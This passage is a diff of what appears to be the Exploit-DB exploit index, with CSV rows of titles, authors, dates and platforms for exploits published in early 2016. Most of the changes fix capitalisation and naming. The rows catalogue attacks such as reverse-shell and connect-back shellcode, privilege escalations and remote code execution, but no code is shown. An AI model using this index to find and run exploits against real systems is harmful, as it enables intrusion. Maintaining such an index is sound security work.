Forgery",2016-02-16,hyp3rlinx,php,webapps,0 39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0 @@ -35693,7 +35696,7 @@ id,file,description,date,author,platform,type,port 39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80 39458,platforms/php/webapps/39458.txt,"OCS Inventory NG 2.2 - SQL Injection",2016-02-17,Ephreet,php,webapps,0 39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0 -39461,platforms/multiple/dos/39461.txt,"Adobe Flash - TextField Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0 +39461,platforms/multiple/dos/39461.txt,"Adobe Flash - textfield Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0 39462,platforms/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",multiple,dos,0 39463,platforms/multiple/dos/39463.txt,"Adobe Flash - LoadVars.decode Use-After-Free",2016-02-17,"Google Security Research",multiple,dos,0 39464,platforms/multiple/dos/39464.txt,"Adobe Flash - H264 Parsing Out-of-Bounds Read",2016-02-17,"Google Security Research",multiple,dos,0 @@ -35720,7 +35723,7 @@ id,file,description,date,author,platform,type,port 39486,platforms/windows/webapps/39486.txt,"Dell OpenManage Server Administrator 8.2 - Authenticated Directory Traversal",2016-02-23,hantwister,windows,webapps,0 39487,platforms/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",multiple,dos,0 39488,platforms/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery",2016-02-23,"Julien Ahrens",json,webapps,8443 -39489,platforms/php/webapps/39489.py,"Wordpress Extra User Details Plugin 0.4.2 - Privilege Escalation",2016-02-24,"Panagiotis Vagenas",php,webapps,80 +39489,platforms/php/webapps/39489.py,"WordPress Extra User Details Plugin 0.4.2 - Privilege Escalation",2016-02-24,"Panagiotis Vagenas",php,webapps,80 39490,platforms/multiple/dos/39490.txt,"Wireshark - vwr_read_s2_s3_W_rec Heap Based Buffer Overflow",2016-02-24,"Google Security Research",multiple,dos,0 39491,platforms/linux/dos/39491.txt,"libxml2 - xmlDictAddString Heap Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 39492,platforms/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 @@ -35729,7 +35732,7 @@ id,file,description,date,author,platform,type,port 39495,platforms/windows/webapps/39495.py,"IBM Lotus Domino R8 - Password Hash Extraction Exploit",2016-02-25,"Jonathan Broche",windows,webapps,0 39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0 39497,platforms/ashx/webapps/39497.txt,"Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities",2016-02-26,LiquidWorm,ashx,webapps,0 -39498,platforms/php/webapps/39498.txt,"Wordpress Ocim MP3 Plugin - SQL Injection",2016-02-26,"xevil and Blankon33",php,webapps,80 +39498,platforms/php/webapps/39498.txt,"WordPress Ocim MP3 Plugin - SQL Injection",2016-02-26,"xevil and Blankon33",php,webapps,80 39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Root Exploit",2016-02-26,Sysdream,linux,remote,0 39500,platforms/linux/webapps/39500.txt,"Zimbra 8.0.9 GA - Cross-Site Request Forgery",2016-02-26,Sysdream,linux,webapps,443 39501,platforms/php/webapps/39501.txt,"Centreon 2.5.3 - Remote Command Execution",2016-02-26,Sysdream,php,webapps,0 @@ -35737,21 +35740,21 @@ id,file,description,date,author,platform,type,port 39503,platforms/multiple/dos/39503.txt,"Wireshark - print_hex_data_buffer / print_packet Use-After-Free",2016-02-26,"Google Security Research",multiple,dos,0 39504,platforms/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",android,dos,0 39505,platforms/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",linux,dos,0 -39506,platforms/php/webapps/39506.txt,"JSN PowerAdmin Joomla! Extension 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80 -39507,platforms/php/webapps/39507.txt,"Wordpress More Fields 2.1 Plugin - Cross-Site Request Forgery",2016-02-29,"Aatif Shahdad",php,webapps,80 +39506,platforms/php/webapps/39506.txt,"JSN Poweradmin Joomla! Extension 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80 +39507,platforms/php/webapps/39507.txt,"WordPress More Fields 2.1 Plugin - Cross-Site Request Forgery",2016-02-29,"Aatif Shahdad",php,webapps,80 39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - SHFolder.dll Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0 -39509,platforms/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - .pm4 Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos,0 +39509,platforms/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos,0 39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0 39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0 -39513,platforms/php/webapps/39513.txt,"Wordpress CP Polls Plugin 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80 +39513,platforms/php/webapps/39513.txt,"WordPress CP Polls Plugin 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80 39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution",2016-03-01,Metasploit,php,remote,80 39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload",2016-03-01,Metasploit,windows,remote,8080 39516,platforms/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69 -39517,platforms/windows/dos/39517.py,"Freeproxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080 -39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash (PoC)",2016-03-02,redknight99,windows,dos,0 +39517,platforms/windows/dos/39517.py,"FreeProxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080 +39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - '.bmp' Crash (PoC)",2016-03-02,redknight99,windows,dos,0 39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0 39520,platforms/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local,0 -39521,platforms/php/webapps/39521.txt,"Wordpress Bulk Delete Plugin 5.5.3 - Privilege Escalation",2016-03-03,"Panagiotis Vagenas",php,webapps,80 +39521,platforms/php/webapps/39521.txt,"WordPress Bulk Delete Plugin 5.5.3 - Privilege Escalation",2016-03-03,"Panagiotis Vagenas",php,webapps,80 39522,platforms/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",hardware,remote,0 39523,platforms/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass",2016-03-03,Metasploit,windows,local,0 39524,platforms/php/webapps/39524.js,"ATutor LMS - install_modules.php Cross-Site Request Forgery Remote Code Execution",2016-03-07,mr_me,php,webapps,0 @@ -35760,10 +35763,10 @@ id,file,description,date,author,platform,type,port 39529,platforms/multiple/dos/39529.txt,"Wireshark - wtap_optionblock_free Use-After-Free",2016-03-07,"Google Security Research",multiple,dos,0 39530,platforms/windows/dos/39530.txt,"Avast - Authenticode Parsing Memory Corruption",2016-03-07,"Google Security Research",windows,dos,0 39531,platforms/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local,0 -39533,platforms/windows/dos/39533.txt,"Adobe Digital Editions 4.5.0 - .pdf Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",windows,dos,0 +39533,platforms/windows/dos/39533.txt,"Adobe Digital Editions 4.5.0 - '.pdf' Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",windows,dos,0 39534,platforms/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80 39535,platforms/linux/local/39535.sh,"Exim 4.84-3 - Privilege Escalation",2016-03-09,"Hacker Fantastic",linux,local,0 -39536,platforms/php/webapps/39536.txt,"Wordpress SiteMile Project Theme 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",php,webapps,80 +39536,platforms/php/webapps/39536.txt,"WordPress SiteMile Project Theme 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",php,webapps,80 39537,platforms/linux/dos/39537.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'digi_acceleport' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 39538,platforms/linux/dos/39538.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'Wacom' Multiple Nullpointer Dereferences",2016-03-09,"OpenSource Security",linux,dos,0 39539,platforms/linux/dos/39539.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor (treo_attach) Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 @@ -35772,23 +35775,23 @@ id,file,description,date,author,platform,type,port 39541,platforms/linux/dos/39541.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'mct_u232' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 39543,platforms/linux/dos/39543.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'cdc_acm' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 39544,platforms/linux/dos/39544.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'aiptek' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 -39545,platforms/linux/dos/39545.txt,"Linux Kernel 3.10 / 3.18 / 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0 +39545,platforms/linux/dos/39545.txt,"Linux Kernel 3.10 / 3.18 / 4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0 39546,platforms/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 & Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0 -39547,platforms/php/webapps/39547.txt,"Wordpress Best Web Soft Captcha Plugin 4.1.5 - Multiple Vulnerabilities",2016-03-10,"Colette Chamberland",php,webapps,80 -39548,platforms/php/webapps/39548.txt,"Wordpress WP Advanced Comment Plugin 0.10 - Persistent Cross-Site Scripting",2016-03-10,"Mohammad Khaleghi",php,webapps,80 +39547,platforms/php/webapps/39547.txt,"WordPress Best Web Soft Captcha Plugin 4.1.5 - Multiple Vulnerabilities",2016-03-10,"Colette Chamberland",php,webapps,80 +39548,platforms/php/webapps/39548.txt,"WordPress WP Advanced Comment Plugin 0.10 - Persistent Cross-Site Scripting",2016-03-10,"Mohammad Khaleghi",php,webapps,80 39549,platforms/linux/local/39549.txt,"Exim < 4.86.2 - Privilege Escalation",2016-03-10,"Dawid Golunski",linux,local,0 39550,platforms/multiple/dos/39550.py,"libotr 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",multiple,dos,0 39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0 -39552,platforms/php/webapps/39552.txt,"Wordpress Beauty & Clean Theme 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80 -39553,platforms/php/webapps/39553.txt,"Wordpress DZS Videogallery Plugin <=8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80 +39552,platforms/php/webapps/39552.txt,"WordPress Beauty & Clean Theme 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80 +39553,platforms/php/webapps/39553.txt,"WordPress DZS Videogallery Plugin <=8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80 39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80 39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0 39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0 39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - SEH Overflow Denial of Service",2016-03-14,INSECT.B,windows,dos,0 -39558,platforms/php/webapps/39558.txt,"Wordpress Site Import Plugin 1.0.1 - Local File Inclusion / Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80 +39558,platforms/php/webapps/39558.txt,"WordPress Site Import Plugin 1.0.1 - Local File Inclusion / Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80 39559,platforms/php/webapps/39559.txt,"TeamPass 2.1.24 - Multiple Vulnerabilities",2016-03-14,"Vincent Malguy",php,webapps,80 -39560,platforms/windows/dos/39560.txt,"Windows Kernel - ATMFD.dll OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 -39561,platforms/windows/dos/39561.txt,"Windows Kernel - ATMFD.dll OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 +39560,platforms/windows/dos/39560.txt,"Microsoft Windows - Kernel ATMFD.dll OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 +39561,platforms/windows/dos/39561.txt,"Microsoft Windows - Kernel ATMFD.dll OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443 39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0 @@ -35798,52 +35801,52 @@ id,file,description,date,author,platform,type,port 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80 39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0 -39574,platforms/windows/local/39574.cs,"Microsoft Windows 8.1/10 (Windows/x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0 -39575,platforms/php/webapps/39575.txt,"Wordpress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 -39576,platforms/php/webapps/39576.txt,"Wordpress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 -39577,platforms/php/webapps/39577.txt,"Wordpress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80 +39574,platforms/windows/local/39574.cs,"Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0 +39575,platforms/php/webapps/39575.txt,"WordPress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 +39576,platforms/php/webapps/39576.txt,"WordPress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 +39577,platforms/php/webapps/39577.txt,"WordPress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80 39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse Shell Shellcode",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0 39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit",2016-03-21,"Rakan Alotaibi",windows,local,0 39580,platforms/php/webapps/39580.txt,"Disc ORGanizer - DORG - Multiple Vulnerabilities",2016-03-21,SECUPENT,php,webapps,80 39581,platforms/hardware/webapps/39581.txt,"D-Link DWR-932 Firmware 4.00 - Authentication Bypass",2016-03-21,"Saeed reza Zamanian",hardware,webapps,80 39582,platforms/php/webapps/39582.txt,"Xoops 2.5.7.2 - Arbitrary User Deletions Cross-Site Request Forgery",2016-03-21,hyp3rlinx,php,webapps,80 39583,platforms/php/webapps/39583.txt,"Xoops 2.5.7.2 - Directory Traversal Bypass",2016-03-21,hyp3rlinx,php,webapps,80 -39584,platforms/php/webapps/39584.txt,"Wordpress Image Export Plugin 1.1.0 - Arbitrary File Disclosure",2016-03-21,AMAR^SHG,php,webapps,80 -39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share SEH Overflow Remote Code Execution Exploit",2016-03-21,"Paul Purcell",windows,remote,80 +39584,platforms/php/webapps/39584.txt,"WordPress Image Export Plugin 1.1.0 - Arbitrary File Disclosure",2016-03-21,AMAR^SHG,php,webapps,80 +39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share SEH Overflow Remote Code Execution",2016-03-21,"Paul Purcell",windows,remote,80 39586,platforms/php/webapps/39586.txt,"Dating Pro Genie 2015.7 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",php,webapps,80 39587,platforms/php/webapps/39587.txt,"iTop 2.2.1 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",php,webapps,80 39588,platforms/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",php,webapps,80 -39589,platforms/php/webapps/39589.txt,"Wordpress HB Audio Gallery Lite Plugin 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,php,webapps,80 +39589,platforms/php/webapps/39589.txt,"WordPress HB Audio Gallery Lite Plugin 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,php,webapps,80 39590,platforms/php/webapps/39590.txt,"Joomla Easy YouTube Gallery 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80 -39591,platforms/php/webapps/39591.txt,"Wordpress Brandfolder Plugin 3.0 - Remote File Inclusion / Local File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 -39592,platforms/php/webapps/39592.txt,"Wordpress Dharma booking Plugin 2.38.3 - File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 -39593,platforms/php/webapps/39593.txt,"Wordpress Memphis Document Library Plugin 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80 -39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - .m3u Stack Overflow",2016-03-22,"Charley Celice",windows,local,0 -39595,platforms/multiple/local/39595.txt,"OS X / iOS - Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0 +39591,platforms/php/webapps/39591.txt,"WordPress Brandfolder Plugin 3.0 - Remote File Inclusion / Local File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 +39592,platforms/php/webapps/39592.txt,"WordPress Dharma booking Plugin 2.38.3 - File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 +39593,platforms/php/webapps/39593.txt,"WordPress Memphis Document Library Plugin 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80 +39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Stack Overflow",2016-03-22,"Charley Celice",windows,local,0 +39595,platforms/multiple/local/39595.txt,"Apple Mac OS X / iOS - SUID Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0 39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0 39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection",2016-03-23,"Goran Tuzovic",multiple,webapps,80 -39621,platforms/php/webapps/39621.txt,"Wordpress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 +39621,platforms/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 39622,platforms/hardware/webapps/39622.txt,"Trend Micro Deep Discovery Inspector 3.8/3.7 - Cross-Site Request Forgery",2016-03-27,hyp3rlinx,hardware,webapps,80 -39599,platforms/windows/remote/39599.txt,"Comodo Antivirus - Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0 +39599,platforms/windows/remote/39599.txt,"Comodo AntiVirus - Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0 39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0 39601,platforms/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",windows,dos,0 39602,platforms/windows/dos/39602.txt,"Comodo - LZMA Decoder Heap Overflow via Insufficient Parameter Checks",2016-03-23,"Google Security Research",windows,dos,0 39603,platforms/windows/dos/39603.txt,"Comodo - Integer Overlow Leading to Heap Overflow Parsing Composite Documents",2016-03-23,"Google Security Research",windows,dos,0 39604,platforms/multiple/dos/39604.txt,"Wireshark - dissect_ber_integer Static Out-of-Bounds Write",2016-03-23,"Google Security Research",multiple,dos,0 39605,platforms/windows/dos/39605.txt,"Comodo - Integer Overflow Leading to Heap Overflow in Win32 Emulation",2016-03-23,"Google Security Research",windows,dos,0 -39606,platforms/windows/dos/39606.txt,"Comodo Antivirus - Heap Overflow in LZX Decompression",2016-03-23,"Google Security Research",windows,dos,0 -39607,platforms/osx/dos/39607.c,"OS X Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort",2016-03-23,"Google Security Research",osx,dos,0 +39606,platforms/windows/dos/39606.txt,"Comodo AntiVirus - Heap Overflow in LZX Decompression",2016-03-23,"Google Security Research",windows,dos,0 +39607,platforms/osx/dos/39607.c,"Apple Mac OS X - Kernel Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort",2016-03-23,"Google Security Research",osx,dos,0 39608,platforms/windows/dos/39608.txt,"Adobe Flash - Shape Rendering Crash",2016-03-23,"Google Security Research",windows,dos,0 39609,platforms/windows/dos/39609.txt,"Adobe Flash - Zlib Codec Heap Overflow",2016-03-23,"Google Security Research",windows,dos,0 39610,platforms/windows/dos/39610.txt,"Adobe Flash - Sprite Creation Use-After-Free",2016-03-23,"Google Security Research",windows,dos,0 39611,platforms/windows/dos/39611.txt,"Adobe Flash - Uninitialized Stack Parameter Access in AsBroadcaster.broadcastMessage UaF Fix",2016-03-23,"Google Security Research",windows,dos,0 39612,platforms/windows/dos/39612.txt,"Adobe Flash - Uninitialized Stack Parameter Access in Object.unwatch UaF Fix",2016-03-23,"Google Security Research",windows,dos,0 39613,platforms/windows/dos/39613.txt,"Adobe Flash - Uninitialized Stack Parameter Access in MovieClip.swapDepths UaF Fix",2016-03-23,"Google Security Research",windows,dos,0 -39614,platforms/osx/dos/39614.c,"OS X Kernel - AppleKeyStore Use-After-Free",2016-03-23,"Google Security Research",osx,dos,0 -39615,platforms/osx/dos/39615.c,"OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in Nvidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0 -39616,platforms/osx/dos/39616.c,"OS X Kernel - Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0 +39614,platforms/osx/dos/39614.c,"Apple Mac OS X - Kernel AppleKeyStore Use-After-Free",2016-03-23,"Google Security Research",osx,dos,0 +39615,platforms/osx/dos/39615.c,"Apple Mac OS X - Kernel Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in Nvidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0 +39616,platforms/osx/dos/39616.c,"Apple Mac OS X - Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0 39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0 -39623,platforms/php/webapps/39623.txt,"Wordpress Photocart Link Plugin 1.6 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 +39623,platforms/php/webapps/39623.txt,"WordPress Photocart Link Plugin 1.6 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 39627,platforms/windows/dos/39627.py,"TallSoft SNMP TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69 @@ -35852,48 +35855,48 @@ id,file,description,date,author,platform,type,port 39630,platforms/windows/local/39630.g,"Cogent Datahub 7.3.9 Gamma Script - Elevation of Privilege",2016-03-28,mr_me,windows,local,0 39631,platforms/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free Exploit",2016-03-29,"Google Security Research",multiple,remote,0 39632,platforms/linux/remote/39632.py,"LShell 0.9.15 - Remote Code Execution",2012-12-30,drone,linux,remote,0 -39633,platforms/multiple/dos/39633.txt,"Apple Quicktime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 1",2016-03-30,"Francis Provencher",multiple,dos,0 -39634,platforms/multiple/dos/39634.txt,"Apple Quicktime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 2",2016-03-30,"Francis Provencher",multiple,dos,0 -39635,platforms/multiple/dos/39635.txt,"Apple Quicktime < 7.7.79.80.95 - PSD File Parsing Memory Corruption",2016-03-30,"Francis Provencher",multiple,dos,0 +39633,platforms/multiple/dos/39633.txt,"Apple QuickTime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 1",2016-03-30,"Francis Provencher",multiple,dos,0 +39634,platforms/multiple/dos/39634.txt,"Apple QuickTime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 2",2016-03-30,"Francis Provencher",multiple,dos,0 +39635,platforms/multiple/dos/39635.txt,"Apple QuickTime < 7.7.79.80.95 - PSD File Parsing Memory Corruption",2016-03-30,"Francis Provencher",multiple,dos,0 39637,platforms/php/webapps/39637.txt,"CubeCart 6.0.10 - Multiple Vulnerabilities",2016-03-30,"High-Tech Bridge SA",php,webapps,80 39638,platforms/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos,0 39639,platforms/php/remote/39639.rb,"ATutor 2.2.1 - Directory Traversal / Remote Code Execution",2016-03-30,Metasploit,php,remote,80 39640,platforms/android/remote/39640.txt,"Metaphor - Stagefright Exploit with ASLR Bypass",2016-03-30,NorthBit,android,remote,0 39641,platforms/hardware/webapps/39641.html,"MOBOTIX Video Security Cameras - Cross-Site Request Forgery (Add Admin) Exploit",2016-03-31,LiquidWorm,hardware,webapps,80 -39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x < 3.1.0 - ZIP File path Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080 +39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080 39643,platforms/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload",2016-03-31,Metasploit,java,remote,8080 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0 39645,platforms/multiple/remote/39645.php,"PHP 5.5.33 / 7.0.4 - SNMP Format 